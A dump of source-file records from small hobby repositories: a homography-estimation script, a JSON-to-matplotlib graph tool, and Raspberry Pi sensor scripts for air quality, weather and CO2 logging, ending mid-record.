"text": "import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef split_at_char(s, first, last ):\n try:\n start = s.rindex( first ) + len( first )\n end = s.rindex( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef get_average_dist_to_origin(points):\n dist = (points - [0,0])**2\n dist = np.sum(dist, axis=1)\n dist = np.sqrt(dist)\n\n return np.mean(dist)\n\ndef read_data(folder, file):\n \"\"\"\n Returns a list of lists containing the points of the\n reference and warped images.\n \"\"\"\n\n print(\"Reading original and warped image datapoints...\")\n\n with open(os.path.join(\"boat\", \"homography.txt\"), \"r\") as file:\n image_data = [line for line in file]\n\n image1 = image_data[0]\n image1 = split_at_char(image1, \"[\", \"]\").split(\";\")\n image1 = [elem.split(\",\") for elem in image1]\n image1 = [list(map(int,i)) for i in image1]\n\n image2 = image_data[1]\n image2 = split_at_char(image2, \"[\", \"]\").split(\";\")\n image2 = [elem.split(\",\") for elem in image2]\n image2 = [list(map(int,i)) for i in image2]\n\n return image1, image2\n\ndef normalize_image_points(image):\n \"\"\"\n Input: 2D list with x,y image points\n Output:\n \"\"\"\n\n print()\n print(\"Normalizing data using similarity matrix...\")\n\n image = np.array(image)\n mean, std = np.mean(image, 0), np.std(image)\n\n # define similarity transformation\n # no rotation, scaling using sdv and setting centroid as origin\n Transformation = np.array([[std/np.sqrt(2), 0, mean[0]],\n [0, std/np.sqrt(2), mean[1]],\n [0, 0, 1]])\n\n # apply transformation on data points\n Transformation = np.linalg.inv(Transformation)\n image = np.dot(Transformation, np.concatenate((image.T, np.ones((1, image.shape[0])))))\n\n # retrieve normalized image in the original input shape (25, 2)\n image = image[0:2].T\n\n print(\"translated origin:\", np.mean(image, axis=0))\n print(\"average distance to origin:\", get_average_dist_to_origin(image))\n\n return image, Transformation\n\ndef compute_matrix_A(points1, points2, no_points):\n \"\"\"\n Input: Normalized correspondences for image1 and image2\n Output: Matrix A as defined in Zisserman p. 91\n \"\"\"\n\n A = []\n\n for i in range(0, no_points):\n x, y = points1[i, 0], points1[i, 1]\n x_prime, y_prime = points2[i, 0], points2[i, 1]\n\n # create A_i according to the eq. in the book\n # here we are assuming w_i is one\n A.append([0, 0, 0, -x, -y, -1, y_prime*x, y_prime*y, y_prime])\n A.append([x, y, 1, 0, 0, 0, -x_prime*x, -x_prime*y, -x_prime])\n\n print()\n print(\"Stacked matrix A shape:\", np.shape(A))\n\n return np.asarray(A)\n\ndef compute_SVD(matrix_A):\n print()\n print(\"Computing SVD...\")\n\n return np.linalg.svd(matrix_A)\n\ndef get_vector_h(matrix_V):\n \"\"\"\n Input: Matrix V from SVD of A\n Output: Unitary vector h (last column of V matrix of SVD)\n \"\"\"\n print()\n print(\"Obtaining vector h...\")\n\n h = matrix_V[-1,:] / matrix_V[-1,-1]\n\n return h\n\ndef main():\n # read image data points\n image1, image2 = read_data(\"boat\", \"homography.txt\")\n\n # set data points to numpy arrays\n image1 = np.array(image1)\n image2 = np.array(image2)\n no_points = image1.shape[0]\n\n # normalize data\n image1_normalized, T = normalize_image_points(image1)\n image2_normalized, T_prime = normalize_image_points(image2)\n\n # get matrix A for each normalized correspondence (dims 2*n x 9)\n A = compute_matrix_A(image1_normalized, image2_normalized, no_points)\n\n # compute SVD of A\n U, S, V = compute_SVD(A)\n\n # get last column of V and normalize it (this is the vector h)\n h = get_vector_h(V)\n\n # obtain homography (H tilde)\n print()\n print(\"Reshaping to get homography H_tilde...\")\n H_tilde = h.reshape(3,3)\n\n # denormalize to obtain homography (H) using the transformations and generalized pseudo-inverse\n H = np.dot(np.dot(np.linalg.pinv(T_prime), H_tilde), T)\n\n print()\n print(\"Denormalized to obtain homography H for 2D data points...\")\n print(\"Matrix H:\")\n print(H)\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
razcohen5/XYGraphCreation
|
https://github.com/razcohen5/XYGraphCreation
|
2ce5136e0467ee3ddd9fefe5c990d7bd3000e942
|
b110881ccbdbc8c8926338f3f281bcd6376b535b
|
6cf0f1772b54e22abd6ed91916a002eb87994569
|
refs/heads/master
| 2022-11-27T01:36:20.583712 | 2020-03-18T15:53:31 | 2020-03-18T15:53:31 | 248,274,564 | 0 | 0 | null | 2020-03-18T15:46:18 | 2020-03-18T15:53:35 | 2022-11-15T23:22:00 |
Java
|
[
{
"alpha_fraction": 0.7232876420021057,
"alphanum_fraction": 0.7232876420021057,
"avg_line_length": 26.076923370361328,
"blob_id": "7abe74a18849fe21c9ae186305bd65fbaf377955",
"content_id": "6ffab87eb2b35132e7f0a421568b7b9bce8527ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 13,
"path": "/XYGraphCreation/src/main/java/json/JsonIO.java",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "package json;\r\n\r\nimport com.fasterxml.jackson.databind.ObjectMapper;\r\n\r\nimport java.io.File;\r\nimport java.io.IOException;\r\n\r\npublic class JsonIO {\r\n public static void writeToJsonFile(Object object, String jsonFilePath) throws IOException {\r\n ObjectMapper mapper = new ObjectMapper();\r\n mapper.writeValue(new File(jsonFilePath),object);\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.5962145328521729,
"alphanum_fraction": 0.5962145328521729,
"avg_line_length": 21.923076629638672,
"blob_id": "9f4855265161f76b0e38e151b75a94a218e2b855",
"content_id": "0c7c6d941b029773f38e18325cb0bbc5d52234d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 317,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 13,
"path": "/XYGraphCreation/src/main/python/GraphDrawer.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nclass GraphDrawer:\r\n \r\n @staticmethod\r\n def drawContinuous(graph):\r\n plt.plot(graph.xValues, graph.yValues)\r\n plt.show()\r\n \r\n @staticmethod\r\n def drawScattered(graph):\r\n plt.scatter(graph.xValues, graph.yValues)\r\n plt.show()\r\n\r\n"
},
{
"alpha_fraction": 0.7795823812484741,
"alphanum_fraction": 0.7795823812484741,
"avg_line_length": 33.75,
"blob_id": "00412ab5e860790064f33c674d6f8442a1d944b9",
"content_id": "2999876dc178f6384b3afa04b58d9fbdd981bcf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 12,
"path": "/XYGraphCreation/src/main/python/MainExample.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nfrom JsonIO import JsonIO\r\nfrom GraphJsonConverter import GraphJsonConverter\r\nfrom GraphDrawer import GraphDrawer\r\n\r\ndef MainExample():\r\n jsonFilePath = \"C:\\intellij\\projects\\XYGraphCreation\\examplejsonfiles\\json.txt\"\r\n graphAsJson = JsonIO.read(jsonFilePath)\r\n graph = GraphJsonConverter.convertJsonToGraph(graphAsJson)\r\n GraphDrawer.drawScattered(graph)\r\n GraphDrawer.drawContinuous(graph)\r\n \r\nMainExample()"
},
{
"alpha_fraction": 0.5978022217750549,
"alphanum_fraction": 0.5978022217750549,
"avg_line_length": 28.200000762939453,
"blob_id": "2ef71cd3c9e3cab98cd4b48d645366009d9e82d5",
"content_id": "76bbc8ab98d72aee2957296941c776c6695e0cd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 455,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/XYGraphCreation/src/main/python/GraphJsonConverter.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nfrom Graph import Graph\r\n\r\nclass GraphJsonConverter:\r\n GRAPH_POINTS_NAME = 'points'\r\n X_VALUE_NAME = 'x'\r\n Y_VALUE_NAME = 'y'\r\n \r\n @classmethod\r\n def convertJsonToGraph(cls,graphAsJson):\r\n xValues = []\r\n yValues = []\r\n for point in graphAsJson[cls.GRAPH_POINTS_NAME]:\r\n xValues.append(point[cls.X_VALUE_NAME])\r\n yValues.append(point[cls.Y_VALUE_NAME])\r\n return Graph(xValues,yValues)"
},
{
"alpha_fraction": 0.5819672346115112,
"alphanum_fraction": 0.5819672346115112,
"avg_line_length": 28,
"blob_id": "c6e17725c1ec08b594b8531c80e45f4581dc766d",
"content_id": "9468adebad0c3492807d1c2f6653d6f2de7b9b68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 122,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 4,
"path": "/XYGraphCreation/src/main/python/Graph.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nclass Graph:\r\n def __init__(self, xValues,yValues):\r\n self.xValues = xValues\r\n self.yValues = yValues"
},
{
"alpha_fraction": 0.604651153087616,
"alphanum_fraction": 0.604651153087616,
"avg_line_length": 19.25,
"blob_id": "52ea0c75ef12d44cdfbb9d4043e84563a2b11dc4",
"content_id": "b4cfbe2f8418b2b95f12855bfeeb16c9581faa94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 8,
"path": "/XYGraphCreation/src/main/python/JsonIO.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport json\r\n\r\nclass JsonIO:\r\n \r\n @staticmethod\r\n def read(jsonFilePath):\r\n with open(jsonFilePath) as jsonFile:\r\n return json.load(jsonFile)"
}
] | 6 |
ziruijiang/dosenet-raspberrypi
|
https://github.com/ziruijiang/dosenet-raspberrypi
|
a775cbd6564eff7e772ad4a104f7d0ab78d3d1d0
|
2bb4945a4878084199b9e96f2661cfb02f21ab9d
|
ac589579959ff5aeccc9f1413584ac94bcafceaa
|
refs/heads/master
| 2021-01-24T09:32:21.935408 | 2018-04-11T17:04:56 | 2018-04-11T17:04:56 | 123,018,745 | 0 | 1 |
MIT
| 2018-02-26T19:21:55 | 2018-02-26T19:21:57 | 2018-04-11T18:26:59 |
Python
|
[
{
"alpha_fraction": 0.5185551643371582,
"alphanum_fraction": 0.5643246173858643,
"avg_line_length": 32.40495681762695,
"blob_id": "44485dec559355bfd86bca1060c52b7435d3ae86",
"content_id": "8db59fdf7be0d512ae1ed0e31818814e30b6cb29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4042,
"license_type": "permissive",
"max_line_length": 275,
"num_lines": 121,
"path": "/air_quality_test.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "import serial\nimport binascii\nimport csv\nimport datetime\nimport time\nimport argparse\nimport sys\n\n#Initiate timer\nparser = argparse.ArgumentParser()\nparser.add_argument(\"runtime\", type = int, help = \"Enter a whole number. This will determine the length of time in seconds for which the test will run.\")\ninfo = parser.parse_args()\nrun_time = info.runtime\ncounter_time= int(time.time())\n\nsys.stdout.flush()\n\n# Open CSV file to save results\nsys.stdout.flush()\n#Open CSV file to log results\nlogfilename = \"air_quality_test_results.csv\"\nlog_results = open(logfilename, \"wb+\", 0)\n\n#Open CSV file to log results\nlogfilename = \"air_quality_test_results.csv\"\nlog_results = open(logfilename, \"wb+\", 0)\n\n# Add metadata to CSV file\nmetadata = []\nmetadata.append(\"Date and Time\")\nmetadata.append(\"0.3 um\")\nmetadata.append(\"0.5 um\")\nmetadata.append(\"1.0 um\")\nmetadata.append(\"2.5 um\")\nmetadata.append(\"5.0 um\")\nmetadata.append(\"10 um\")\nmetadata.append(\"PM 1.0\")\nmetadata.append(\"PM 2.5\")\nmetadata.append(\"PM 10\")\nlog_results.write(metadata[0]+\",\"+metadata[1]+\",\"+metadata[2]+\",\"+metadata[3]+\",\"+metadata[4]+\",\"+metadata[5]+\",\"+metadata[6]+\",\"+metadata[7]+\",\"+metadata[8]+\",\"+metadata[9]+\"\\n\")\n\nprint(\"Results: \")\n\nport = serial.Serial(\"/dev/ttyS0\", baudrate=9600, timeout=1.5)\nwhile True:\n try:\n text = port.read(32)\n except:\n print('Error: Exiting')\n exit()\n\n buffer = [ord(c) for c in text]\n if buffer[0] == 66:\n #Check sum with last byte of list\n sumation = sum(buffer[0:30])\n checkbyte = (buffer[30]<<8)+buffer[31]\n if sumation == ((buffer[30]<<8)+buffer[31]):\n buf = buffer[1:32]\n\n # Get concentrations ug/m3\n PM01Val=((buf[3]<<8) + buf[4])\n PM25Val=((buf[5]<<8) + buf[6])\n PM10Val=((buf[7]<<8) + buf[8])\n\n # Get number of particles in 0.1 L of air above specific diameters\n\n P3 =((buf[15]<<8) + buf[16])\n P5 =((buf[17]<<8) + buf[18])\n P10 =((buf[19]<<8) + buf[20])\n P25 =((buf[21]<<8) + buf[22])\n P50 =((buf[23]<<8) + buf[24])\n P100=((buf[25]<<8) + buf[26])\n\n date_time = datetime.datetime.now()\n\n # Print Log File Information\n print(\"Date/Time: \"+datetime.datetime.strftime(date_time, \"%Y-%m-%d %H:%M:%S\")+\"\\n\")\n print(\"P3: \"+repr(P3))\n print(\"P5: \"+repr(P5))\n print(\"P10: \"+repr(P10))\n print(\"P25: \"+repr(P25))\n print(\"P50: \"+repr(P50))\n print(\"P100: \"+repr(P100)+\"\\n\")\n print(\"PM01: \"+repr(PM01Val))\n print(\"PM25: \"+repr(PM25Val))\n print(\"PM10: \"+repr(PM10Val)+\"\\n\")\n\n # Put results in a CSV file\n results = []\n results.append(date_time)\n results.append(repr(P3))\n results.append(repr(P5))\n results.append(repr(P10))\n results.append(repr(P25))\n results.append(repr(P50))\n results.append(repr(P100))\n results.append(repr(PM01Val))\n results.append(repr(PM25Val))\n results.append(repr(PM10Val))\n pen_results.writerow(results[0:10])\n log_results.write(datetime.datetime.strftime(results[0], \"%Y-%m-%d %H:%M:%S\")+\",\"+str(results[1])+\",\"+str(results[2])+\",\"+str(results[3])+\",\"+str(results[4])+\",\"+str(results[5])+\",\"+str(results[6])+\",\"+str(results[7])+\",\"+str(results[8])+\",\"+str(results[9])+\"\\n\")\n\n else:\n print('Check Sum Failed')\n\n # Put results in a CSV file\n results = []\n date_time = datetime.datetime.now()\n results.append(date_time)\n results.append('Check Sum Failed')\n pen_results.writerow(results[0:2])\n\n else:\n print('Data Acquisition Failed')\n\n # Put results in a CSV file\n results = []\n date_time = datetime.datetime.now()\n results.append(date_time)\n results.append('Check Sum Failed')\n pen_results.writerow(results[0:2])\n"
},
{
"alpha_fraction": 0.5455202460289001,
"alphanum_fraction": 0.5823699235916138,
"avg_line_length": 28.46808433532715,
"blob_id": "630fbad6685614263a2d1d01510c5fc5d8660ea4",
"content_id": "0b4f91911c33e9e36d3952a75ab285422ed3dbfc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 47,
"path": "/weather_class.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 12 11:32:41 2017\n\n@author: Ludi Cao\n\"\"\"\nimport time\nimport datetime\nimport csv\nfrom Adafruit_BME280 import *\n\nclass weather_DAQ(object):\n def __init__(self):\n self.sensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8)\n self.running=False\n \n def open_file():\n file_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\n filename = \"weather_test_results_\"+file_time+\".csv\"\n results=csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n metadata=[\"Time\", \"Temp (C)\",\"Pressure (hPa)\", \"Humidity (%)\"]\n results.writerow(metadata)\n\n def start():\n global job1\n date_time = datetime.datetime.now()\n degrees = sensor.read_temperature()\n pascals = sensor.read_pressure()\n hectopascals = pascals / 100\n humidity = sensor.read_humidity()\n\n print ('Temp = {0:0.3f} deg C'.format(degrees))\n print ('Pressure = {0:0.2f} hPa'.format(hectopascals))\n print ('Humidity = {0:0.2f} %'.format(humidity))\n \n data=[]\n data.append(date_time)\n data.append(degrees)\n data.append(hectopascals)\n data.append(humidity)\n \n results.writerow(data)\n job1=top.after(1000,start)\n \n def stop():\n global job1\n top.after_cancel(job1)"
},
{
"alpha_fraction": 0.6087295413017273,
"alphanum_fraction": 0.6188620328903198,
"avg_line_length": 24.65999984741211,
"blob_id": "a99ef32cba0c252170be48f4e2dfdde04cddb852",
"content_id": "63a649c0d67193f113e784a9807c5affd436a3f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1283,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 50,
"path": "/SensorTest.sh",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\ndose_net_dir=/home/pi/dosenet-raspberrypi\n\nfor i in $@\ndo\n case $i in\n AQ)\n echo \"Starting Air Quality Sensor\"\n sudo python $dose_net_dir/air_quality_test.py &\n ;;\n\n ADC)\n echo \"Starting CO2 Sensor and UV Sensor\"\n sudo python $dose_net_dir/adc_test.py &\n ;;\n\n AT)\n echo \"Starting Atmosphere Sensor\"\n sudo python $dose_net_dir/weather_test.py &\n ;;\n\n Si)\n echo \"Starting Silicon Radiation Detector\" > /tmp/pocket_manager.log\n sudo python $dose_net_dir/manager.py --logfile /tmp/pocket_manager.log >>/tmp/pocket_manager.log 2>&1\n ;;\n\n CsI)\n echo \"Starting Cesium Iodide Radiation Detector\" > /tmp/d3s_manager.log\n sudo python $dose_net_dir/manager_D3S.py --logfile /tmp/d3s_manager.log >> /tmp/d3s_manager.log 2>&1\n ;;\n\n stop)\n echo \"Stopping Sensor Programs.\"\n sudo pkill -SIGTERM -f manager.py\n sudo pkill -SIGTERM -f air_quality_test.py\n sudo pkill -SIGTERM -f manager_D3S.py\n sudo pkill -SIGTERM -f weather_test.py\n sudo pkill -SIGTERM -f adc_test.py\n exit 0\n ;;\n\n *)\n echo \"Error: Incorrect Usage\"\n echo \"Usage: /home/pi/dosenet-raspberrypi/SensorTest.sh {AQ|AT|ADC|Si|CsI|Stop}\"\n exit 1\n ;;\n\n esac\ndone\nexit 0\n"
},
{
"alpha_fraction": 0.5240980982780457,
"alphanum_fraction": 0.5370631217956543,
"avg_line_length": 35.57732009887695,
"blob_id": "80dd715de093c616a2d47a57e577bed24886978f",
"content_id": "23781269475a64de084ac12f2655aebd34efc070",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7096,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 194,
"path": "/data_handler_aq.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "from auxiliaries import datetime_from_epoch\nfrom auxiliaries import set_verbosity\nfrom globalvalues import ANSI_RESET, ANSI_YEL, ANSI_GR, ANSI_RED\nfrom globalvalues import ANSI_BLUE, ANSI_CYAN\nfrom globalvalues import DEFAULT_DATA_BACKLOG_FILE_AQ\nfrom globalvalues import AQ_PM_DISPLAY_TEXT, AQ_P_DISPLAY_TEXT\nfrom globalvalues import BREAK_LINE, TIME_DISPLAY_TEXT, strf\nfrom collections import deque\nimport socket\nimport time\nimport ast\nimport os\nimport errno\nimport csv\n\nclass Data_Handler_AQ(object):\n \"\"\"\n Object for sending the data from the Air Quality\n sensor to the server.\n\n Also handles writing data to datalog and storing\n data to the memory\n \"\"\"\n\n def __init__(self,\n manager=None,\n verbosity=1,\n logfile=None,\n variables=None,\n ):\n\n self.v = verbosity\n if manager and logfile is None:\n set_verbosity(self, logfile=manager.logfile)\n else:\n set_verbosity(self, logfile=logfile)\n\n self.manager = manager\n self.queue = deque('')\n\n self.variables = variables\n\n \"\"\"\n The average_data list has elements comprised of:\n\n PM01 = Concentration of Particulate Matter less than 1.0um in ug/m3\n PM25 = Concentration of Particulate Matter less than 2.5um in ug/m3\n PM10 = Concentration of Particulate Matter less than 10um in ug/m3\n\n P03 = Number of paricles in 0.1 L of air over a diameter of 0.3um\n P05 = Number of paricles in 0.1 L of air over a diameter of 0.5um\n P10 = Number of paricles in 0.1 L of air over a diameter of 1.0um\n P25 = Number of paricles in 0.1 L of air over a diameter of 2.5um\n P50 = Number of paricles in 0.1 L of air over a diameter of 5.0um\n P100 = Number of paricles in 0.1 L of air over a diameter of 10um\n \"\"\"\n\n def test_send(self, average_data):\n \"\"\"\n Test Mode\n \"\"\"\n self.vprint(\n 1, ANSI_RED + \" * Test mode, not sending to server * \" +\n ANSI_RESET)\n\n def no_config_send(self, average_data):\n \"\"\"\n Configuration file not present\n \"\"\"\n self.vprint(1, \"Missing config file, not sending to server\")\n\n def no_publickey_send(self, average_data):\n \"\"\"\n Publickey not present\n \"\"\"\n self.vprint(1, \"Missing public key, not sending to server\")\n\n def send_to_memory(self, average_data):\n \"\"\"\n Network is not up\n \"\"\"\n self.send_to_queue(average_data)\n self.vprint(1, \"Network down, saving to queue in memory\")\n\n def regular_send(self, this_end, average_data):\n \"\"\"\n Normal send\n \"\"\"\n self.manager.sender.send_data_new_AQ(this_end, average_data)\n if self.queue:\n self.vprint(1, \"Flushing memory queue to server\")\n while self.queue:\n #print(len(self.queue))\n trash = self.queue.popleft()\n self.manager.sender.send_data_new_AQ(\n trash[0], trash[1])\n\n def send_all_to_backlog(self, path=DEFAULT_DATA_BACKLOG_FILE_AQ):\n if self.queue:\n self.vprint(1, \"Flushing memory queue to backlog file\")\n with open(path, 'a') as f:\n while self.queue:\n f.write('{0}, '.format(self.queue.popleft()))\n\n def send_to_queue(self, average_data):\n \"\"\"\n Adds the time and average_data to the queue object.\n \"\"\"\n time_string = time.time()\n self.queue.append([time_string, average_data])\n\n def backlog_to_queue(self, path=DEFAULT_DATA_BACKLOG_FILE_AQ):\n \"\"\"\n Sends data in backlog to queue and deletes the backlog\n \"\"\"\n if os.path.isfile(path):\n self.vprint(2, \"Flushing backlog file to memory queue\")\n with open(path, 'r') as f:\n data = f.read()\n data = ast.literal_eval(data)\n for i in data:\n self.queue.append([i[0], i[1]])\n print(self.queue)\n os.remove(path)\n\n def main(self, datalog, average_data, this_start, this_end):\n \"\"\"\n Determines how to handle the average air quality data\n \"\"\"\n start_text = datetime_from_epoch(this_start).strftime(strf)\n end_text = datetime_from_epoch(this_end).strftime(strf)\n\n self.vprint(\n 1, TIME_DISPLAY_TEXT.format(\n start_time=start_text,\n end_time=end_text))\n for i in range(3):\n \tself.vprint(\n 1, AQ_PM_DISPLAY_TEXT.format(\n variable=self.variables[i],\n avg_data=average_data[i]))\n for i in range(3, 9):\n \tself.vprint(\n 1, AQ_P_DISPLAY_TEXT.format(\n variable=self.variables[i],\n avg_data=average_data[i]))\n self.vprint(\n 1, BREAK_LINE)\n\n self.manager.data_log(datalog, average_data=average_data)\n\n if self.manager.test:\n self.send_to_memory(average_data)\n elif not self.manager.config:\n self.no_config_send(average_data)\n elif not self.manager.publickey:\n self.no_publickey_send(average_data)\n else:\n try:\n self.regular_send(this_end, average_data)\n except (socket.gaierror, socket.error, socket.timeout) as e:\n if e == socket.gaierror:\n if e[0] == socket.EAI_AGAIN:\n # TCP and UDP\n # network is down, but NetworkStatus didn't notice yet\n # (resolving DNS like dosenet.dhcp.lbl.gov)\n self.vprint(\n 1,\n 'Failed to send packet! Address resolution error')\n else:\n self.vprint(\n 1, 'Failed to send packet! Address error: ' +\n '{}: {}'.format(*e))\n elif e == socket.error:\n if e[0] == errno.ECONNREFUSED:\n # TCP\n # server is not accepting connections\n self.vprint(\n 1, 'Failed to send packet! Connection refused')\n elif e[0] == errno.ENETUNREACH:\n # TCP and UDP\n # network is down, but NetworkStatus didn't notice yet\n # (IP like 131.243.51.241)\n self.vprint(\n 1, 'Failed to send packet! Network is unreachable')\n else:\n # consider handling errno.ECONNABORTED errno.ECONNRESET\n self.vprint(\n 1, 'Failed to send packet! Socket error: ' +\n '{}: {}'.format(*e))\n elif e == socket.timeout:\n # TCP\n self.vprint(1, 'Failed to send packet! Socket timeout')\n self.send_to_memory(average_data)\n"
},
{
"alpha_fraction": 0.6254767179489136,
"alphanum_fraction": 0.6559877991676331,
"avg_line_length": 28.795454025268555,
"blob_id": "bede744581a1273ecb7463d6b0f33f4a3c59fc52",
"content_id": "f965ea2ec1927fc8150d1718620be1fa22e2ed56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1311,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 44,
"path": "/weather_test.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "#!/bin/python\n\nimport time\nimport datetime\nimport csv\nimport sys\nfrom Adafruit_BME280 import *\n\nsys.stdout.flush()\n\nsensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8)\n\nfile_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\nfilename = \"weather_test_results_\"+file_time+\".csv\"\nresults=csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n\nlogfilename = \"weather_test_results.csv\"\nlogresults = open(logfilename, \"wb+\", 0)\n\nmetadata=[\"Time\", \"Temp (C)\",\"Pressure (hPa)\", \"Humidity (%)\"]\nresults.writerow(metadata)\nlogresults.write(metadata[0]+\",\"+metadata[1]+\",\"+metadata[2]+\",\"+metadata[3]+\"\\n\")\n\nwhile True:\n date_time = datetime.datetime.now()\n degrees = sensor.read_temperature()\n pascals = sensor.read_pressure()\n hectopascals = pascals / 100\n humidity = sensor.read_humidity()\n\n print ('Temp = {0:0.3f} deg C'.format(degrees))\n print ('Pressure = {0:0.2f} hPa'.format(hectopascals))\n print ('Humidity = {0:0.2f} %'.format(humidity))\n\n data=[]\n data.append(date_time)\n data.append(degrees)\n data.append(hectopascals)\n data.append(humidity)\n\n results.writerow(data)\n logresults.write(datetime.datetime.strftime(data[0], \"%Y-%m-%d %H:%M:%S\")+\",\"+str(data[1])+\",\"+str(data[2])+\",\"+str(data[3])+\"\\n\")\n\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5859375,
"alphanum_fraction": 0.6374080777168274,
"avg_line_length": 30.536231994628906,
"blob_id": "f4bbf5498b9803ffdef8433db0778c5582bf27e0",
"content_id": "34c182820269a53a066e700c3b7e10bdec77f477",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2176,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 69,
"path": "/adc_test.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# Simple example of reading the MCP3008 analog input channels and printing\n# them all out.\n# Author: Tony DiCola\n# License: Public Domain\nimport time\nimport datetime\nimport csv\nimport sys\n\n# Import SPI library (for hardware SPI) and MCP3008 library.\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n\nsys.stdout.flush()\n\n# Software SPI configuration:\nCLK = 18\nMISO = 23\nMOSI = 24\nCS = 25\nmcp = Adafruit_MCP3008.MCP3008(clk=CLK, cs=CS, miso=MISO, mosi=MOSI)\n\n# Hardware SPI configuration:\n# SPI_PORT = 0\n# SPI_DEVICE = 0\n# mcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\nprint('Reading MCP3008 values, press Ctrl-C to quit...')\n# Print nice channel column headers.\nprint('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*range(8)))\nprint('-' * 57)\n\nfile_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\nfilename = \"CO2_test_results_\"+file_time+\".csv\"\nadc_results = csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n\nlogfilename = \"CO2_test_results.csv\"\nlogresults = open(logfilename, \"wb+\", 0)\n\nmetadata = []\nmetadata.append(\"Date and Time\")\nmetadata.append(\"CO2 (ppm)\")\nmetadata.append(\"UV\")\nadc_results.writerow(metadata[:])\nlogresults.write(metadata[0]+\",\"+metadata[1]+\",\"+metadata[2]+\"\\n\")\n\n# Main program loop.\nwhile True:\n date_time = datetime.datetime.now()\n # Read all the ADC channel values in a list.\n values = [0]*8\n for i in range(8):\n # The read_adc function will get the value of the specified channel (0-7).\n values[i] = mcp.read_adc(i)\n # Print the ADC values.\n # print('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*values))\n print('| {0:>4} | {1:>4} |'.format(values[0],values[7]))\n concentration = 5000/496*values[0] - 1250\n print('|{}|'.format(concentration))\n # Pause for half a second.\n uv_index = values[7]\n results = []\n results.append(date_time)\n results.append(concentration)\n results.append(uv_index)\n\n adc_results.writerow(results[:])\n logresults.write(datetime.datetime.strftime(results[0], \"%Y-%m-%d %H:%M:%S\")+\",\"+str(results[1])+\",\"+str(results[2])+\"\\n\")\n\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5505245923995972,
"alphanum_fraction": 0.5571507215499878,
"avg_line_length": 29.957265853881836,
"blob_id": "098c5288840a3dc046ca1c9fdf559b2d6317ffb8",
"content_id": "3c4f2f628a563627ac0d7c31d4789a26fc21fd52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3622,
"license_type": "permissive",
